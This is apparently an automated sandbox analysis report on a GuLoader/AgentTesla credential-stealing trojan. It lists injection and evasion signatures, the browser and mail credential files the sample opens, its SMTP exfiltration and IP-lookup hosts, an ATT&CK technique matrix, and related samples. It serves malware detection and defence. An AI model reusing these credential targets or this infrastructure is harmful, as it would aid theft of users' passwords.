                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\REnBTVfW8q.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7048, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: Yara matchFile source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7048, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7048, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Obfuscated Files or Information
                  1
                  OS Credential Dumping
                  3
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Access Token Manipulation
                  1
                  Software Packing
                  LSASS Memory24
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                  Process Injection
                  1
                  DLL Side-Loading
                  Security Account Manager321
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Masquerading
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                  Virtualization/Sandbox Evasion
                  LSA Secrets141
                  Virtualization/Sandbox Evasion
                  SSHKeylogging23
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Access Token Manipulation
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                  Process Injection
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549457 Sample: REnBTVfW8q.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 26 us2.smtp.mailhostbox.com 2->26 28 smtp.santonswitchgears.com 2->28 30 4 other IPs or domains 2->30 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 7 other signatures 2->44 8 REnBTVfW8q.exe 18 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\nsc2139.tmp, data 8->20 dropped 22 C:\Users\user\AppData\...\Heterognath.Hjs, ASCII 8->22 dropped 24 C:\Users\user\AppData\Local\...\Dusinenes.Hav, data 8->24 dropped 11 powershell.exe 26 8->11         started        process6 signatures7 46 Early bird code injection technique detected 11->46 48 Writes to foreign memory regions 11->48 50 Found suspicious powershell code related to unpacking or dynamic code loading 11->50 52 2 other signatures 11->52 14 msiexec.exe 15 8 11->14         started        18 conhost.exe 11->18         started        process8 dnsIp9 32 us2.smtp.mailhostbox.com 208.91.199.223, 49714, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->32 34 ip-api.com 208.95.112.1, 49713, 80 TUT-ASUS United States 14->34 36 3 other IPs or domains 14->36 54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->54 56 Tries to steal Mail credentials (via file / registry access) 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 60 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 14->60 signatures10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  REnBTVfW8q.exe42%ReversingLabsWin32.Trojan.Guloader
                  REnBTVfW8q.exe100%AviraTR/Injector.uccww
                  REnBTVfW8q.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://crl.m;0%Avira URL Cloudsafe
                  http://www.skinstudio.netG0%Avira URL Cloudsafe
                  http://smtp.santonswitchgears.com0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  208.91.199.223
                  truetrue
                    unknown
                    drive.google.com
                    142.250.185.238
                    truefalse
                      high
                      drive.usercontent.google.com
                      216.58.206.65
                      truefalse
                        high
                        api.ipify.org
                        104.26.13.205
                        truefalse
                          high
                          ip-api.com
                          208.95.112.1
                          truefalse
                            high
                            smtp.santonswitchgears.com
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                high
                                http://ip-api.com/line/?fields=hostingfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.google.commsiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.ipify.orgmsiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://smtp.santonswitchgears.commsiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://us2.smtp.mailhostbox.commsiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ip-api.commsiexec.exe, 00000005.00000002.2677888739.0000000025181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.m;powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://drive.usercontent.google.com/msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://apis.google.commsiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://nsis.sf.net/NSIS_ErrorErrorREnBTVfW8q.exe, 00000000.00000000.1406879585.000000000040A000.00000008.00000001.01000000.00000003.sdmp, REnBTVfW8q.exe, 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                  high
                                                                  https://api.ipify.org/tmsiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.skinstudio.netGREnBTVfW8q.exe, 00000000.00000000.1406900001.000000000044D000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        208.95.112.1
                                                                        ip-api.comUnited States
                                                                        53334TUT-ASUSfalse
                                                                        216.58.206.65
                                                                        drive.usercontent.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        208.91.199.223
                                                                        us2.smtp.mailhostbox.comUnited States
                                                                        394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                        104.26.13.205
                                                                        api.ipify.orgUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        142.250.185.238
                                                                        drive.google.comUnited States
                                                                        15169GOOGLEUSfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1549457
                                                                        Start date and time:2024-11-05 16:35:19 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 12s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:10
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:REnBTVfW8q.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/13@5/5
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 97%
                                                                        • Number of executed functions: 133
                                                                        • Number of non-executed functions: 29
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 1568 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: REnBTVfW8q.exe
                                                                        TimeTypeDescription
                                                                        10:36:18API Interceptor40x Sleep call for process: powershell.exe modified
                                                                        10:36:56API Interceptor549508x Sleep call for process: msiexec.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        208.95.112.1ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        NOuxGNqQH7.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        IPx5gzPi7I.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        RDF987656789000.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        2q8mDVUlgI.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                        • ip-api.com/json/?fields=225545
                                                                        SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        208.91.199.223ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              Proforma Invoice_21-1541 And Packing List.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        SecuriteInfo.com.Win32.RATX-gen.3768.11045.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          UPDATED FLOOR PLAN_3D.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            us2.smtp.mailhostbox.comulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.91.199.223
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.91.199.223
                                                                                            copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.91.199.224
                                                                                            SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 208.91.199.223
                                                                                            Proforma Invoice_21-1541 And Packing List.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 208.91.199.223
                                                                                            Tax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 208.91.199.224
                                                                                            PO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.91.199.223
                                                                                            Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.91.198.143
                                                                                            Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 208.91.199.225
                                                                                            Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 208.91.199.223
                                                                                            ip-api.comulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.95.112.1
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.95.112.1
                                                                                            NOuxGNqQH7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            IPx5gzPi7I.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            RDF987656789000.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            2q8mDVUlgI.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                                            • 208.95.112.1
                                                                                            SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            api.ipify.orgulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 172.67.74.152
                                                                                            D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.67.74.152
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 172.67.74.152
                                                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 172.67.74.152
                                                                                            b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 104.26.13.205
                                                                                            https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                                            • 172.67.74.152
                                                                                            Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                            • 104.26.12.205
                                                                                            COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 104.26.12.205
                                                                                            REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 104.26.13.205
                                                                                            https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                            • 104.26.12.205
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUSNIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                            • 188.114.96.3
                                                                                            YvY5omjy2a.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                            • 188.114.97.3
                                                                                            https://me-qr.com/f/tritonstone?hash=Get hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                            • 172.67.133.135
                                                                                            ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 172.67.74.152
                                                                                            https://micheline.aceflavall.com/Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 104.21.20.47
                                                                                            D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.67.74.152
                                                                                            http://www.axa-assistance.co.ukGet hashmaliciousUnknownBrowse
                                                                                            • 104.18.86.42
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 172.67.74.152
                                                                                            L#U043e#U0430der.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.187.9
                                                                                            TUT-ASUSulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.95.112.1
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.95.112.1
                                                                                            NOuxGNqQH7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            IPx5gzPi7I.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            copto de pago.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            RDF987656789000.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            orden de compra_.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            2q8mDVUlgI.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                                            • 208.95.112.1
                                                                                            SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            PUBLIC-DOMAIN-REGISTRYUSulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.91.199.223
                                                                                            Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                            • 208.91.199.223
